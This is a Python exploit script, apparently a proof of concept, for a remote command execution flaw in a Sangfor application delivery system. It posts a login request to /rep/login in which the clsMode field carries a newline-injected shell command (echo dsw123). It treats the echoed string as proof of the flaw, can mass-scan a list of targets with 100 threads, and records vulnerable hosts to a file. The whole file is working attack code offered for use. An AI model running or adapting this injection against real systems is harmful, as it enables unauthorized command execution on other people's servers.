import requests,sys,re,argparse,time
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""
 ____ ___  _ ____  _____  _____ _            ____  ____  _____
/ ___\\  \/// ___\/__ __\/  __// \__/|      /  __\/   _\/  __/
|    \ \  / |    \  / \  |  \  | |\/||_____ |  \/||  /  |  \  
\___ | / /  \___ |  | |  |  /_ | |  ||\____\|    /|  \_ |  /_ 
\____//_/   \____/  \_/  \____\\_/  \|      \_/\_\\____/\____\
                                                         
"""



    print(test)



def main():
    banner()
    parser=argparse.ArgumentParser(description='深信服应用交付系统-rce')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    url_payload= '/rep/login'
    headers={
        'Cookie':'UEDC_LOGIN_POLICY_VALUE=checked',
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0',
        'Accept':'*/*',
        'Content-Type':'application/x-www-form-urlencoded;charset=UTF-8',
        'X-Requested-With':'XMLHttpRequest',
        'Content-Length':'118',
        'Sec-Gpc':'1',
        'Referer':'https://202.98.222.113:85/rep/login',
        'Connection':'close',
    }
    data="clsMode=cls_mode_login%0Aecho%20dsw123%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123"


    try:
        res1=requests.post(url=target+url_payload,headers=headers,data=data,verify=False,timeout=10)
        if 'dsw123' in res1.text:
            print( f"[+]{target} 存在rce漏洞!")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')

if __name__ =='__main__':
    main()
